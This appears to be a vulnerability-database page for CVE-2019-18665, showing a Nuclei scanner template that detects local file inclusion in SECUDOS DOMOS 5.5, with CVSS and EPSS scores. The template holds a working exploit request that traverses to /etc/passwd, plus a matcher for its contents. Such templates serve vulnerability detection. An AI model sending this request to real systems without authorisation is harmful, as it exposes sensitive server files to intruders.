Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-18665
HistoryJun 20, 2022 - 3:49 a.m.

DOMOS 5.5 - Local File Inclusion

2022-06-2003:49:11
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.082 Low

EPSS

Percentile

94.4%

SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
id: CVE-2019-18665

info:
  name: DOMOS 5.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
  remediation: |
    Apply the latest patch or update to a version that is not affected by this vulnerability.
  reference:
    - https://atomic111.github.io/article/secudos-domos-directory_traversal
    - https://vuldb.com/?id.144804
    - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
    - https://www.cybersecurity-help.cz/vdb/SB2019110403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-18665
    cwe-id: CWE-22
    epss-score: 0.08504
    epss-percentile: 0.93861
    cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: secudos
    product: domos
  tags: cve,cve2019,domos,lfi,secudos

http:
  - method: GET
    path:
      - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220509c4051fe06c3b442182ccea599c293cb206f29fb380ac73d9f4b9f7515f1bb022100e913f5bb1074f270b620860b37f1772c8266d161293f835f86eb2bbfd806ddf3:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.082 Low

EPSS

Percentile

94.4%

Related for NUCLEI:CVE-2019-18665